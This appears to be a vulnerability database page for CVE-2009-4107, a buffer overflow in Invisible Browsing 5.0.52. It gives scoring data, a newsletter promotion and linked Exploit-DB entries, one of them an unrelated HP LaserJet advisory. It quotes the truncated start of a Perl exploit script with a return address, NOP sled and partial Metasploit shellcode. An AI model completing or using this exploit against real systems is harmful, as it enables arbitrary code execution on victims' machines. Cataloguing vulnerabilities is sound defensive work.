CVE-2009-4107
published 2009-11-29CVE-2009-4107: Buffer overflow in Invisible Browsing 5.0.52 allows user-assisted remote attackers to execute arbitrary code via a crafted .ibkey file containing a long string.
PriorityP341critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
4.83%
90.9th percentile
Buffer overflow in Invisible Browsing 5.0.52 allows user-assisted remote attackers to execute arbitrary code via a crafted .ibkey file containing a long string.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| amplusnet | invisible_browsing | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
HP LaserJet - Directory Traversal in PJL Interface
exploitdb·2010-11-29
CVE-2010-4107 HP LaserJet - Directory Traversal in PJL Interface
HP LaserJet - Directory Traversal in PJL Interface
---
n.runs AG
http://www.nruns.com/ security(at)nruns.com
n.runs-SA-2010.003 16-Nov-2010
Vendor: Hewlett-Packard, http://www.hp.com
Affected Products: Various HP LaserJet MFP devices
(See HP advisory [3] for the complete list)
Vulnerability: Directory Traversal in PJL interface
Risk: HIGH
Vendor communication:
2009/11/25 Initial notification of Hewlett-Packard
2009/11/25 HP confirms receival of advisory
2010/02/05 n.runs AG requests update on the reported issue
2010/02/05 HP notifies n.runs AG that an advisory is in preparation
2010/11/15 Publication of HP advisory
Overview:
The Printer Job Language (PJL) was developed by Hewlett-Packard to
provide a method for switching printer languages at the job level
and for status exchange bet
Exploit-DB
Invisible Browsing 5.0.52 - '.ibkey' Local Buffer Overflow
exploitdb·2009-09-14
CVE-2009-4107 Invisible Browsing 5.0.52 - '.ibkey' Local Buffer Overflow
Invisible Browsing 5.0.52 - '.ibkey' Local Buffer Overflow
---
#!/usr/bin/perl
print qq(
############################################################
## Iranian Pentesters Home ##
## Www.Pentesters.Ir ##
## PLATEN -[ H.jafari ]- ##
## Invisible Browsing 5.0.52 (.ibkey) Local BoF Exploit ##
## bug found & exploited by: PLATEN ##
## E-mail && blog: ##
## hjafari.blogspot.com ##
## platen.secure[at]gmail[dot]com ##
## Greetings: Cru3l.b0y, b3hz4d, Cdef3nder ##
## and all members in Pentesters.ir ##
############################################################
);
# Note: I just test this version
$junk ="\x41"x 5000;
$ret = "\x93\x43\x92\x7c";
$nop = "\x90" x 50;
# win32_exec - Size=160
#EXITFUNC=seh CMD=calc
#Encoder=PexFnstenvSub http://metasploit.com
$shellcode =
"\x31\xc9\x83\xe9\xde\xd9\
No writeups or analysis indexed.
2009-11-29
Published